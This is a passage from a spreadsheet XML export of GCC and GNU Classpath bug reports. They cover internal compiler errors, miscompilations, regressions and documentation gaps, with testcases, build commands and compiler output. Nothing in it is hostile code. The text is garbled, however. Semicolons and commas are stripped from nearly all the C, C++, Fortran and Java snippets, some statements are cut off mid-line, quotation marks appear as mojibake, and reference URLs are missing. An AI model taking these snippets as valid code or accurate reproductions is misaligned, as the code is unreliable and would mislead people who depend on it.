      if (stop_reply_queue)
	mark_async_event_handler (remote_async_inferior_event_token)
    }
  return event_ptid
}
I thought perhaps that inlining was causing a problem (in which case this
error message is quite confusing since it would point to the wrong function).
However I added this:
  memset (
... to the function before the if and the error went away.
So I think this is a gcc bug.
I will attach the .i file.</t>
  </si>
  <si>
    <t>GCC-9292</t>
  </si>
  <si>
    <t>hppa1.1-rtems configurery problems</t>
  </si>
  <si>
    <t>config.gcc entry does not include t-rtems nor enable
RTEMS threads.
config/pa/rtems.h needs to use -N when linking.
Attached patch fixes problem.
Release:
3.3 branch and trunk</t>
  </si>
  <si>
    <t>GCC-35390</t>
  </si>
  <si>
    <t>[4.3/4.4 Regression] ~~n != n in some cases</t>
  </si>
  <si>
    <t>the preprocessed file:
unsigned
foo (int n)
{
  return ~((unsigned)~n)
}
The above code is compiled to:
 Function foo (foo)
 enabled by -tree-original
{
  return (unsigned int) ~n
}
This should be return (unsigned int) n.</t>
  </si>
  <si>
    <t>takeshi.mouri.net</t>
  </si>
  <si>
    <t>GCC-41669</t>
  </si>
  <si>
    <t>Infinite recursion trying to build gcc</t>
  </si>
  <si>
    <t>Gcc goes into an infinite recursion trying to build gcc. Reduced test:
cc1 diagnostic.i -quiet -O2 -flto -o diagnostic.s
as -o diagnostic.o diagnostic.s
cc1 ggc-common.i -quiet -O2 -flto -o ggc-common.s
as -o ggc-common.o ggc-common.s
cc1 optabs.i -quiet -O2 -flto -o optabs.s
as -o optabs.o optabs.s
lto1 -quiet  -O2 diagnostic.o ggc-common.o optabs.o -o test.s
The recursion happens in alias.c:717
  set = lang_hooks.get_alias_set (t)</t>
  </si>
  <si>
    <t>espindola</t>
  </si>
  <si>
    <t>GCC-61959</t>
  </si>
  <si>
    <t>[4.8/4.9/4.10 Regression] ICE: in tree_to_uhwi at tree.h:3657 when building Mozilla code</t>
  </si>
  <si>
    <t>Created attachment 33208
preprocessed source zipped
I ran into an internal compiler error while trying to compile the Gecko codebase with the patch at [1].
The output was:
/home/botond/dev/mozilla/refactoring/dom/events/EventStateManager.cpp:5609:1: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Preprocessed source stored into /tmp/cc7rD5Nc.out file please attach this to your bugreport.
Attached is the preprocessed source I had to zip it to stay within the attachment size limit.
My GCC version is 4.7.3 OS is Linux Mint 15 (Olivia).
Please let me know if there is any further informative I can provide.
[1] https://bug923512.bugzilla.mozilla.org/attachment.cgi?id=8464279</t>
  </si>
  <si>
    <t>botond</t>
  </si>
  <si>
    <t>GCC-26817</t>
  </si>
  <si>
    <t>ICE in verify_ssa with -ftree-loop-linear</t>
  </si>
  <si>
    <t>$ cat y.f90
        subroutine test(ban)
        integer intent(in) :: n
        integer save :: n2
        real*8 save :: n2inv
        real*8 intent(inout) :: a(0:n/8-10:7)b(0:n/8-10:7)
        real*8 :: r1i1tt
        if(n2==262144)then a=b GOTO 1 endif
        if(n2==524288)then
          GOTO 1
        endif
        if(n2==1048576)then
          GOTO 1
        endif
        if(n2==2097152)GOTO 1
        STOP
1       continue
        r1=a(04) i1=a(14)
        tt=(r1+i1)*(r1-i1) i1=r1*i1
        b(20)=    tt *n2inv
        b(30)=(i1+i1)*n2inv
        if(n2==8)RETURN
        STOP
        end subroutine test
$ elm3b11:/home/pawar&gt; /opt/gcc-nightly/trunk-20060322/bin/gfortran -c -o y.o -ftree-loop-linear -O2 -m32   y.f90
y.f90: In function â€˜testâ€™:
y.f90:1: error: definition in block 15 follows the use
for SSA_NAME: PARM_NOALIAS.19_70 in statement:
#   VUSE 
r1_33 = (*a_32)[D.916_30]
y.f90:1: internal compiler error: verify_ssa failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-12273</t>
  </si>
  <si>
    <t>libstdc++-v3/include/bits/demangle.h:217: internal compiler error: virtual array [0]: element 0 out of bounds in initialize_inlined_parameters at tree-inline.c:680</t>
  </si>
  <si>
    <t>last successful build for native powerpc64-linux:
Mon Sep  8 14:16:03 UTC 2003
olh@mandarine:~/obj-gcc/powerpc64-unknown-linux-gnu/32/libstdc++-v3/src&gt; /home/olh/obj-gcc/gcc/xgcc -shared-libgcc -B/home/olh/obj-gcc/gcc/ -nostdinc++ -L/home/olh/obj-gcc/powerpc64-unknown-linux-gnu/32/libstdc++-v3/src -L/home/olh/obj-gcc/powerpc64-unknown-linux-gnu/32/libstdc++-v3/src/.libs -B/home/olh/install-gcc-head/powerpc64-unknown-linux-gnu/bin/ -B/home/olh/install-gcc-head/powerpc64-unknown-linux-gnu/lib/ -isystem /home/olh/install-gcc-head/powerpc64-unknown-linux-gnu/include -isystem /home/olh/install-gcc-head/powerpc64-unknown-linux-gnu/sys-include -m32 -fPIC -mstrict-align -I/home/olh/obj-gcc/powerpc64-unknown-linux-gnu/32/libstdc++-v3/include/powerpc64-unknown-linux-gnu -I/home/olh/obj-gcc/powerpc64-unknown-linux-gnu/32/libstdc++-v3/include -I/home/olh/gcc-head/libstdc++-v3/libsupc++ -O2 -O1 -Wall -fsigned-char -O1 -Wall -fsigned-char -D_GNU_SOURCE -m32 -fPIC -mstrict-align -fno-implicit-templates -Wall -Wno-format -W -Wwrite-strings -fdiagnostics-show-location=once -fimplicit-templates -c /home/olh/gcc-head/libstdc++-v3/src/demangle.cc  -fPIC -DPIC -o .libs/demangle.o --save-temps
In file included from /home/olh/gcc-head/libstdc++-v3/src/demangle.cc:1468:
/home/olh/obj-gcc/powerpc64-unknown-linux-gnu/32/libstdc++-v3/include/bits/demangle.h: In member function `bool __gnu_cxx::demangler::session::decode_type_with_postfix(std::basic_string Allocator&gt;&amp; std::basic_string Allocator&gt;&amp; __gnu_cxx::demangler::qualifier_list*) [with Allocator = std::allocator]':
/home/olh/obj-gcc/powerpc64-unknown-linux-gnu/32/libstdc++-v3/include/bits/demangle.h:217:   instantiated from `void __gnu_cxx::demangler::qualifier_list::add_qualifier_start(__gnu_cxx::demangler::simple_qualifier_nt int int) [with Allocator = std::allocator]'
/home/olh/gcc-head/libstdc++-v3/src/demangle.cc:1468:   instantiated from here
/home/olh/obj-gcc/powerpc64-unknown-linux-gnu/32/libstdc++-v3/include/bits/demangle.h:217: internal compiler error: virtual array [0]: element 0 out of bounds in initialize_inlined_parameters at tree-inline.c:680
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
olh@mandarine:~/obj-gcc/powerpc64-unknown-linux-gnu/32/libstdc++-v3/src&gt; /home/olh/obj-gcc/gcc/cc1plus -fpreprocessed demangle.ii -quiet -dumpbase demangle.cc -m32 -mstrict-align -m32 -mstrict-align -auxbase-strip .libs/demangle.o -O2 -O1 -O1 -Wall -Wall -Wall -Wno-format -W -Wwrite-strings -version -fPIC -fsigned-char -fsigned-char -fPIC -fno-implicit-templates -fdiagnostics-show-location=once -fimplicit-templates -fPIC -o demangle.s -v -v
ignoring nonexistent directory /home/olh/install-gcc-head/lib/gcc/powerpc64-unknown-linux-gnu/3.4/../../../../powerpc64-unknown-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /home/olh/install-gcc-head/lib/gcc/powerpc64-unknown-linux-gnu/3.4/../../../../include/c++/3.4
 /home/olh/install-gcc-head/lib/gcc/powerpc64-unknown-linux-gnu/3.4/../../../../include/c++/3.4/powerpc64-unknown-linux-gnu
 /home/olh/install-gcc-head/lib/gcc/powerpc64-unknown-linux-gnu/3.4/../../../../include/c++/3.4/backward
 /usr/local/include
 /home/olh/install-gcc-head/include
 /home/olh/install-gcc-head/lib/gcc/powerpc64-unknown-linux-gnu/3.4/include
 /usr/include
End of search list.
GNU C++ version 3.4 20030914 (experimental) (powerpc64-unknown-linux-gnu)
        compiled by GNU C version 3.4 20030914 (experimental).
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
In file included from /home/olh/gcc-head/libstdc++-v3/src/demangle.cc:1468:
/home/olh/obj-gcc/powerpc64-unknown-linux-gnu/32/libstdc++-v3/include/bits/demangle.h: In member function `bool __gnu_cxx::demangler::session::decode_type_with_postfix(std::basic_string Allocator&gt;&amp; std::basic_string Allocator&gt;&amp; __gnu_cxx::demangler::qualifier_list*) [with Allocator = std::allocator]':
/home/olh/obj-gcc/powerpc64-unknown-linux-gnu/32/libstdc++-v3/include/bits/demangle.h:217:   instantiated from `void __gnu_cxx::demangler::qualifier_list::add_qualifier_start(__gnu_cxx::demangler::simple_qualifier_nt int int) [with Allocator = std::allocator]'
/home/olh/gcc-head/libstdc++-v3/src/demangle.cc:1468:   instantiated from here
/home/olh/obj-gcc/powerpc64-unknown-linux-gnu/32/libstdc++-v3/include/bits/demangle.h:217: internal compiler error: virtual array [0]: element 0 out of bounds in initialize_inlined_parameters at tree-inline.c:680
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
olh@mandarine:~/obj-gcc/powerpc64-unknown-linux-gnu/32/libstdc++-v3/src&gt; cat ~/gcc-head/LAST_UPDATED 
Sun Sep 14 07:13:45 UTC 2003
I used this patch (for PR11640) while getting the above I will try without it:
Index: gcc/cfgrtl.c
===================================================================
RCS file: /cvs/gcc/gcc/gcc/cfgrtl.cv
retrieving revision 1.97
diff -u -p -p -u -r1.97 cfgrtl.c
--- gcc/cfgrtl.c        22 Aug 2003 06:45:12 -0000      1.97
+++ gcc/cfgrtl.c        14 Sep 2003 11:05:47 -0000
@@ -7907 +7907 @@ try_redirect_by_replacing_jump (edge e 
       if (tablejump_p (insn &amp;label &amp;table))
        delete_insn_chain (label table)
-      barrier = next_nonnote_insn (src-&gt;end)
+      barrier = next_insn (src-&gt;end)
       if (!barrier || GET_CODE (barrier) != BARRIER)
        emit_barrier_after (src-&gt;end)
     }</t>
  </si>
  <si>
    <t>GCC-35548</t>
  </si>
  <si>
    <t>[4.3/4.4 Regression] g++ 4.3 miscompile this simple program</t>
  </si>
  <si>
    <t>$ cat oops.cpp
class refcounted 
{
public:
	refcounted() throw() : refcount(0) { }
	unsigned add_reference() throw() 
	{ 
		return ++refcount 
	}
	unsigned remove_reference() throw()
	{ 
		return --refcount 
	}
	unsigned get_refcount() const throw() 
	{ 
		return refcount 
	}
	void set_refcount(unsigned r) throw() 
	{ 
		refcount = r 
	}
private:
	unsigned refcount
}
template  class ptr 
{
	T* p
public:
	ptr(T* t) throw() : p(t) 
	{ 
		p-&gt;set_refcount(1) 
	}
	explicit ptr(T&amp; t) throw() : p(&amp;t) 
	{
		p-&gt;add_reference() 
	}
	ptr(const ptr&amp; other) throw() : p(other.p)
	{ 
		p-&gt;add_reference() 
	}
	~ptr()
	{
		if (p-&gt;remove_reference() == 0)
			delete p
	}
	ptr&amp; operator=(const ptr&amp; other)
	{
		T* otherp = other.p
		otherp-&gt;add_reference()
		if (p-&gt;remove_reference() == 0)
			delete p
		p = otherp
		return *this
	}
	T&amp; operator*() const throw() 
	{ 
		return *p 
	}
	T* operator-&gt;() const throw() 
	{ 
		return p 
	}
	friend inline T* get_pointer(const ptr&amp; x) throw() 
	{ 
		return x.p 
	}
	template 
	bool operator==(const ptr&amp; rhs) const throw() 
	{ 
		return p == get_pointer(rhs) 
	}
}
class ex
typedef const void* tinfo_t 
struct tinfo_static_t { }
enum status_flags {
	dynallocated    = 0x0001
	evaluated       = 0x0002
}
class basic : public refcounted
{
public:
	static const tinfo_static_t tinfo_static
	basic() : tinfo_key(&amp;tinfo_static) flags(0) { }
	basic(tinfo_t ti) : tinfo_key(ti) flags(0) { }
	basic(const basic&amp; other) : tinfo_key(other.tinfo_key)
		flags(other.flags &amp; ~dynallocated) { }
	virtual basic* duplicate() const 
	{ 
		return new basic(*this) 
	}
	int compare(const basic&amp; other) const
	{
		if (tinfo() == other.tinfo())
			return compare_same_type(other)
		else if (tinfo() &lt; other.tinfo())
			return -1
		else
			return 1
	}
	const basic&amp; hold() const
	{
		flags |= evaluated
		return *this
	}
	virtual ex eval(int level = 0) const
	tinfo_t tinfo() const 
	{ 
		return tinfo_key 
	}
	virtual ~basic() { }
protected:
	virtual int compare_same_type(const basic&amp; other) const
	{ 
		if (this == &amp;other)
			return 0
		else if (this &gt; &amp;other)
			return 1
		else
			return -1
	}
	tinfo_t tinfo_key
	mutable unsigned flags
private:
	friend class ex
}
const tinfo_static_t basic::tinfo_static = { }
class ex {
private:
	mutable ptr bp
	static ptr construct_from_basic(const basic&amp; other)
	{
		if (!(other.flags &amp; evaluated)) {
			const ex
			if ((other.get_refcount() == 0) &amp;&amp; (other.flags &amp; dynallocated))
				delete 
			return tmpex.bp
		} else {
			if (other.flags &amp; dynallocated) {
				return ptr(const_cast&lt;basic 
			} else {
				basic* bp = other.duplicate()
				bp-&gt;flags |= dynallocated
				return bp
			}
		}
	}
public:
	inline ex(const basic&amp; other) : bp(construct_from_basic(other)) { }
	ex eval(int level = 0) const 
	{ 
		return bp-&gt;eval(level) 
	}
	int compare(const ex&amp; other) const
	{
		if (bp == other.bp)
			return 0
		return bp-&gt;compare(*other.bp)
	}
	inline unsigned get_refcount() const
	{
		return bp-&gt;get_refcount()
	}
}
ex basic::eval(int level) const
{
	return hold()
}
class oops : public basic
{
	int s
protected:
	virtual int compare_same_type(const basic&amp; other) const
	{
		const oops
		if (s == o.s)
			return 0
		if (s &gt; o.s)
			return 1
		return -1
	}
public:
	oops() : basic(&amp;oops::tinfo_static) s(0) { }
	oops(const int s_) : basic(&amp;oops::tinfo_static) s(s_) { }
	ex eval(int level) const
	{
		return oops(s).hold()
	}
	virtual oops* duplicate() const 
	{ 
		return new oops(*this) 
	}
	static const tinfo_static_t tinfo_static
}
const tinfo_static_t oops::tinfo_static = { }
int main(int argc char** argv)
{
	int ret = 0
	const ex e = oops(1).hold()
	const ex
	if (f.get_refcount() == 0)
		++ret // XXX: this should not happen
	if (f.compare(e))
		++ret // XXX: this should not happen
	return ret
}
$ g++-4.3 -O0 -Wall -g oops.cpp -o /tmp/oops-4.3
$ /tmp/oops-4.3
Segmentation fault
When compiled with g++ 3.4 4.{012} the program works as expected
(i.e. exits with zero status).
$ g++-4.3 -v -save-temps -O0 -Wall -g oops.cpp -o /tmp/oops-4.3
Using built-in specs.
Target: x86_64-linux-gnu
Configured with: ../src/configure linux gnu
Thread model: posix
gcc version 4.3.1 20080309 (prerelease) (Debian 4.3.0-1) 
COLLECT_GCC_OPTIONS='-v' '-save-temps' '-Wall' '-O0' '-g' '-o' '/tmp/oops-4.3' '-shared-libgcc' '-mtune=generic'
 /usr/lib/gcc/x86_64-linux-gnu/4.3.1/cc1plus -E -quiet -v -D_GNU_SOURCE ../oops.cpp -mtune=generic -Wall -fworking-directory -O0 -fpch-preprocess -o oops.ii
ignoring nonexistent directory /usr/local/include/x86_64-linux-gnu
ignoring nonexistent directory /usr/lib/gcc/x86_64-linux-gnu/4.3.1/../../../../x86_64-linux-gnu/include
ignoring nonexistent directory /usr/include/x86_64-linux-gnu
#include ... search starts here:
#include  search starts here:
 /usr/include/c++/4.3
 /usr/include/c++/4.3/x86_64-linux-gnu
 /usr/include/c++/4.3/backward
 /usr/local/include
 /usr/lib/gcc/x86_64-linux-gnu/4.3.1/include
 /usr/lib/gcc/x86_64-linux-gnu/4.3.1/include-fixed
 /usr/include
End of search list.
COLLECT_GCC_OPTIONS='-v' '-save-temps' '-Wall' '-O0' '-g' '-o' '/tmp/oops-4.3' '-shared-libgcc' '-mtune=generic'
 /usr/lib/gcc/x86_64-linux-gnu/4.3.1/cc1plus -fpreprocessed oops.ii -quiet -dumpbase oops.cpp -mtune=generic -auxbase oops -g -O0 -Wall -version -o oops.s
GNU C++ (Debian 4.3.0-1) version 4.3.1 20080309 (prerelease) (x86_64-linux-gnu)
	compiled by GNU C version 4.3.1 20080309 (prerelease) GMP version 4.2.2 MPFR version 2.3.1.
GGC heuristics: --param ggc-min-expand=63 --param ggc-min-heapsize=63134
Compiler executable checksum: 6b4f47123a81acc7bc0d52a2f374512f
COLLECT_GCC_OPTIONS='-v' '-save-temps' '-Wall' '-O0' '-g' '-o' '/tmp/oops-4.3' '-shared-libgcc' '-mtune=generic'
 as -V -Qy -o oops.o oops.s
GNU assembler version 2.18.0 (x86_64-linux-gnu) using BFD version (GNU Binutils for Debian) 2.18.0.20080103
COMPILER_PATH=/usr/lib/gcc/x86_64-linux-gnu/4.3.1/:/usr/lib/gcc/x86_64-linux-gnu/4.3.1/:/usr/lib/gcc/x86_64-linux-gnu/:/usr/lib/gcc/x86_64-linux-gnu/4.3.1/:/usr/lib/gcc/x86_64-linux-gnu/:/usr/lib/gcc/x86_64-linux-gnu/4.3.1/:/usr/lib/gcc/x86_64-linux-gnu/
LIBRARY_PATH=/usr/lib/gcc/x86_64-linux-gnu/4.3.1/:/usr/lib/gcc/x86_64-linux-gnu/4.3.1/:/usr/lib/gcc/x86_64-linux-gnu/4.3.1/../../../../lib/:/lib/../lib/:/usr/lib/../lib/:/usr/lib/gcc/x86_64-linux-gnu/4.3.1/../../../:/lib/:/usr/lib/
COLLECT_GCC_OPTIONS='-v' '-save-temps' '-Wall' '-O0' '-g' '-o' '/tmp/oops-4.3' '-shared-libgcc' '-mtune=generic'
 /usr/lib/gcc/x86_64-linux-gnu/4.3.1/collect2 --eh-frame-hdr -m elf_x86_64 --hash-style=both -dynamic-linker /lib64/ld-linux-x86-64.so.2 -o /tmp/oops-4.3 /usr/lib/gcc/x86_64-linux-gnu/4.3.1/../../../../lib/crt1.o /usr/lib/gcc/x86_64-linux-gnu/4.3.1/../../../../lib/crti.o /usr/lib/gcc/x86_64-linux-gnu/4.3.1/crtbegin.o -L/usr/lib/gcc/x86_64-linux-gnu/4.3.1 -L/usr/lib/gcc/x86_64-linux-gnu/4.3.1 -L/usr/lib/gcc/x86_64-linux-gnu/4.3.1/../../../../lib -L/lib/../lib -L/usr/lib/../lib -L/usr/lib/gcc/x86_64-linux-gnu/4.3.1/../../.. oops.o -lstdc++ -lm -lgcc_s -lgcc -lc -lgcc_s -lgcc /usr/lib/gcc/x86_64-linux-gnu/4.3.1/crtend.o /usr/lib/gcc/x86_64-linux-gnu/4.3.1/../../../../lib/crtn.o
P.S.
I haven't posted the preprocessed source since it's virtually identical
to the original one.</t>
  </si>
  <si>
    <t>varg</t>
  </si>
  <si>
    <t>GCC-71346</t>
  </si>
  <si>
    <t>[AVX-512] AVX-512VL insn emitted when it is disabled</t>
  </si>
  <si>
    <t>Testcase attached.
Started from Jakub's r235968.
Reproduce:
./cc1  1.c -dp -m64 -march=knl -Ofast   -quiet -o repro.s 2&gt;/dev/null  cat repro.s |grep shufps |grep xmm17
Those insns belong to AVX-512VL:
        vshufps        $255 %xmm15 %xmm15 %xmm17    # 680   sse_shufps_v4sf/2       [length = 7]
        vshufps        $85 %xmm12 %xmm12 %xmm17     # 682   sse_shufps_v4sf/2       [length = 7]</t>
  </si>
  <si>
    <t>GCC-80828</t>
  </si>
  <si>
    <t>Command line option -e not documented</t>
  </si>
  <si>
    <t>I couldn't find (also grepping under trunk/gcc/doc) any documentation on the -e commandline option. It seems the option and it's argument are directly passed to the linker similar to -T (which is documented in invoke.texi).</t>
  </si>
  <si>
    <t>sirl</t>
  </si>
  <si>
    <t>GCC-54767</t>
  </si>
  <si>
    <t>[4.7 Regression] Incorrect code generated with -O2 -fcheck=bounds</t>
  </si>
  <si>
    <t>Using the code attached:
&gt;gfortran --version | head -2
GNU Fortran (GCC) 4.7.1
Copyright (C) 2012 Free Software Foundation Inc.
&gt;gfortran -O0 -fcheck=bounds xxx_1.f xxx_2.f
&gt;/a.out
           2           1
           3           2
 T
&gt;gfortran -O2 -fcheck=bounds xxx_1.f xxx_2.f
&gt;./a.out
           2           1
           3           1
 F
The results are different and incorrect when compiling with -O2 -fcheck=bounds. They are still correct when compiling with -O1 -fcheck=bounds.</t>
  </si>
  <si>
    <t>arnaud02</t>
  </si>
  <si>
    <t>CLASSPATH-22735</t>
  </si>
  <si>
    <t>inetilb: APOP authentication broken [PATCH]</t>
  </si>
  <si>
    <t xml:space="preserve">I had to apply a patch (attached) to gnu.inet.pop3.POP3Connection to get APOP authentication to work. The default setup tries to use APOP fails and throws an undetailed AuthenticationFailedException :|
Should the POP3Connection fall back to using USER to log in if no APOP timestamp was available?
</t>
  </si>
  <si>
    <t>GCC-34701</t>
  </si>
  <si>
    <t>ICE in tree-ssa-ccp.c with -fipa-struct-reorg</t>
  </si>
  <si>
    <t>The following testcase fails for me when run with -fipa-struct-reorg:
#include 
typedef struct baba
{
  int a
  int b[10]
} type_struct
type_struct *str1
int main()
{
  int i
  str1 = malloc (10 * sizeof (type_struct))
  for (i=0 i&lt;=9 i++)
    str1[i].a = str1[i].b[0]
  return 0
}
The failure is:
try2.c: In function â€˜mainâ€™:
try2.c:12: internal compiler error: in set_lattice_value at tree-ssa-ccp.c:486
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>alond</t>
  </si>
  <si>
    <t>GCC-66985</t>
  </si>
  <si>
    <t>[concept] template introduction with template template parameter and template parameter pack causes ICE</t>
  </si>
  <si>
    <t>Code:
template  class T class... U&gt;
concept bool _Valid = requires { typename T }
template  class T class... U&gt;
struct __defer { }
_Valid{T ...U}
struct __defer {
  using type = T
}
Result:
$ /usr/local/gcc-concepts/bin/g++.exe -std=gnu++1z -c bug.cpp
bug.cpp:8:15: internal compiler error: in cp_parser_single_declaration at cp/parser.c:24808
 _Valid{T ...U}
               ^
bug.cpp:8:15: internal compiler error: Aborted
g++: internal compiler error: Aborted (program cc1plus)
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-44696</t>
  </si>
  <si>
    <t>[OOP] ASSOCIATED fails on polymorphic variables</t>
  </si>
  <si>
    <t>program rte1
  implicit none
  type::node_type
     class(node_type)pointer::parentchild
     integer::id
  end type node_type
  type(node_type)target::root
  allocate(root%child)
  root%child%parent=&gt;root
  root%id=1
  root%child%id=2
  print *root%child%id is child of root%id:
  print *root%child%parent%idroot%idassociated(root%child%parentroot)
  call check(root%childroot)
contains
    subroutine check(thisthat)
    class(node_type)intent(in)target :: this
    class(node_type)intent(in)target :: that
    print *this%id is child of that%id:
    print *this%parent%idthat%idassociated(this%parentthat)
    end subroutine check
end program rte1
------
This is two times the same code: inside the program and as subroutine. The result (GNU Fortran (GCC) 4.6.0 20100627) is different:
           2  is child of            1 :
           1           1 T
           2  is child of            1 :
           1           1 F</t>
  </si>
  <si>
    <t>GCC-7576</t>
  </si>
  <si>
    <t>?: used with static const member variables creates undefined reference</t>
  </si>
  <si>
    <t>The attached code shows the scenario in which use of the ?: operator with const static member variables creates references to variables that ultimately the linker (ld) is not capable of finding.
The attached code demonstrates and documents variations that clearly isolate the ?: operator being used with const static members (note that both results have to be const static for the effect to appear).
Release:
g++ (GCC) 3.1.1 20020710 (prerelease)
Environment:
cygwin Win95 OSR2
How-To-Repeat:
Compile the file with stand g++ options:
$&gt; g++ gcc_test_2.cc</t>
  </si>
  <si>
    <t>CLASSPATH-22980</t>
  </si>
  <si>
    <t>swing: JOptionPane.showInputDialog does not show multiple lines</t>
  </si>
  <si>
    <t xml:space="preserve">Steps to reproduce:
1. Run the attached testcase
Expected results:
1. A window with line1 line2 and line3 shows up.
Actual results:
1. A window shows up but line2 and line3 are not visible.
Testcase:
import javax.swing.*
public class inputdialog extends JFrame {
        public static void main(String[] args) {
                (new inputdialog()).show()
        }
        public inputdialog() {
                JOptionPane.showInputDialog(line1
line2
line3)
        }
}
</t>
  </si>
  <si>
    <t>GCC-21529</t>
  </si>
  <si>
    <t>[4.0/4.1 Regression] code size regression (+40%) with -Os from GCC-3.4.3 to 4.1</t>
  </si>
  <si>
    <t>Compiling this code with -Os is more than 40 % bigger in size with GCC-4.1
compared to GCC-3.4.3.
See also thread: http://gcc.gnu.org/ml/gcc/2005-05/msg00532.html
&gt;&gt;&gt;&gt;
struct disk_interface_str {
    unsigned    nb_IDE_found
    struct IDE_found_str {
        unsigned short  ideIOadr
        unsigned short  ideIOctrladr
        unsigned char   irq
        unsigned char   bios_order
        unsigned short  reserved
        } *IDE_found
    } DI
void reorder_IDE_for_linux (void)
  {
  static const unsigned short idearray[] = {
        0x1F0 0x170
        0x1E8 0x168
        0x1E0 0x160
        }
  unsigned short cpt order
  for (order = 0 order &lt; sizeof(idearray)/sizeof(idearray[0]) order++) {
      for (cpt = order + 1 cpt &lt; DI.nb_IDE_found cpt++)
          if (DI.IDE_found[cpt].ideIOadr == idearray[order])
              break
      if (cpt &lt; DI.nb_IDE_found) {
          struct IDE_found_str save = DI.IDE_found[cpt]
          unsigned short i
          for (i = order i &lt; cpt i++) {
              struct IDE_found_str tmp = DI.IDE_found[i]
              DI.IDE_found[i] = save
              save = tmp
              }
          DI.IDE_found[cpt] = save
          }
      }
  }
&lt;&lt;&lt;&lt;</t>
  </si>
  <si>
    <t>etienne_lorrain</t>
  </si>
  <si>
    <t>GCC-81765</t>
  </si>
  <si>
    <t>Internal compiler error: Segmentation fault with -O2 -fnon-call-exceptions</t>
  </si>
  <si>
    <t>// begin main.cpp
struct A
{
  virtual void do1() { }
}
struct B
{
  A* m_a
  B() : m_a(nullptr) {}
  B(A* a) : m_a(a) {}
  ~B() { if (m_a) m_a-&gt;do1() }
  void do2(B&amp; other)
  {
    A* tmp = m_a
    m_a = other.m_a
    other.m_a = tmp
  }
  B&amp; operator=(A* a)
  {
    B(a).do2(*this)
    return *this
  }
}
int main()
{
  int ar[] = { 0 1 }
  for (int i = 0 i &lt; 2 ++i)
  {
    int j = ar[i]
    B b
    b = nullptr
  }
  return 0
}
// end main.cpp
$ g++ -S -std=c++11 -O2 -fnon-call-exceptions main.cpp
main.cpp: In function â€˜int main()â€™:
main.cpp:25:5: internal compiler error: Segmentation fault
int main()
    ^~~~
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions
$ g++ --version
gcc (Debian 6.3.0-18) 6.3.0 20170516
Copyright (C) 2016 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
$ uname -a
Linux machine 4.9.0-3-amd64 #1 SMP Debian 4.9.30-2+deb9u2 (2017-06-26) x86_64 GNU/Linux</t>
  </si>
  <si>
    <t>theubik</t>
  </si>
  <si>
    <t>GCC-45796</t>
  </si>
  <si>
    <t>[4.6 regression] make targets info-gcc dvi-gcc etc. should work from unbuilt configured tree</t>
  </si>
  <si>
    <t>Running configure and then 'make info-gcc' currently fails with:
make[1]: Entering directory `/tmp/build/gcc'
make[1]: Circular s-tm-texi &lt;- ../../gcc/gcc/doc/tm.texi dependency dropped.
build/genhooks \
			../../gcc/gcc/doc/tm.texi.in &gt; tmp-tm.texi
/bin/sh: line 1: build/genhooks: No such file or directory
make[1]: *** [s-tm-texi] Error 127
It should not be necessary to 'make all' before this.  Likewise for the other toplevel doc targets.</t>
  </si>
  <si>
    <t>rwild</t>
  </si>
  <si>
    <t>GCC-38039</t>
  </si>
  <si>
    <t>[graphite] -02/O3 -fgraphite-identity causes ICE when compiling aermod.f90 Polyhedron 2005 benchmark</t>
  </si>
  <si>
    <t>When compiling the aermod.f90 Polyhedron 2005 benchmark with -O2 -fgraphite-identity or -O3 -fgraphite-identity the gfortran compiler in current gcc trunk ICEs with the error...
aermod.f90: In function â€˜ocalcâ€™:
aermod.f90:8312: internal compiler error: Bus error
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
This compiler ICE doesn't occur when using -O1 -fgraphite-identity.</t>
  </si>
  <si>
    <t>GCC-19337</t>
  </si>
  <si>
    <t>[4.0 Regression] ada does not compile at -O3 (nested functions related)</t>
  </si>
  <si>
    <t>+===========================GNAT BUG DETECTED==============================+
| 4.0.0 20050108 (experimental) (i686-pc-linux-gnu) GCC error:             |
| in make_decl_rtl at varasm.c:867                                        |
| Error detected at ali.adb:2098:1                                         |
| Please submit a bug report see http://gcc.gnu.org/bugs.html.            |
| Include the entire contents of this bug box in the report.               |
| Include the exact gcc or gnatmake command that you entered.              |
| Also include sources listed below in gnatchop format                     |
| (concatenated together with no headers between files).                   |
+==========================================================================+</t>
  </si>
  <si>
    <t>heitkamp</t>
  </si>
  <si>
    <t>GCC-49437</t>
  </si>
  <si>
    <t>interrupt return pop sometimes corrupts sp</t>
  </si>
  <si>
    <t>Simple to reproduce it seems &gt;=5 arguments with any of printf* can cause this. Some code around it was left as it does not happen otherwise.
$ cat bug.c 
#include 
char *pending_messages_put_start(void)
void pending_messages_put_final(void)
void __attribute__((interrupt)) TIM7_IRQHandler(void)
{
        char *msg = pending_messages_put_start()
        snprintf(msg 20 %i %i 1 1)
        pending_messages_put_final()
}
$ arm-none-eabi-gcc -Wall -Os -S bug.c
$ cat bug.s 
        .syntax unified
        .arch armv7-m
        .fpu softvfp
        .eabi_attribute 20 1
        .eabi_attribute 21 1
        .eabi_attribute 23 3
        .eabi_attribute 24 1
        .eabi_attribute 25 1
        .eabi_attribute 26 1
        .eabi_attribute 30 4
        .eabi_attribute 18 4
        .thumb
        .file   bug.c
        .text
        .align  1
        .global TIM7_IRQHandler
        .thumb
        .thumb_func
        .type   TIM7_IRQHandler %function
TIM7_IRQHandler:
        @ Stack Align: May be called with mis-aligned SP.
        @ args = 0 pretend = 0 frame = 0
        @ frame_needed = 0 uses_anonymous_args = 0
        mov     r0 sp
        bic     r1 r0 #7
        mov     sp r1
        push    {r0 lr}
        sub     sp sp #8
        bl      pending_messages_put_start
        movs    r3 #1
        movs    r1 #20
        ldr     r2 .L2
        str     r3 [sp #0]
        bl      snprintf
        bl      pending_messages_put_final
        pop     {r0 r2 r3 lr}    // &lt;-- r3 is in place of r0 expected would be add sp sp #8 pop {r0 lr} I guess
        mov     sp r0
        bx      lr
.L3:
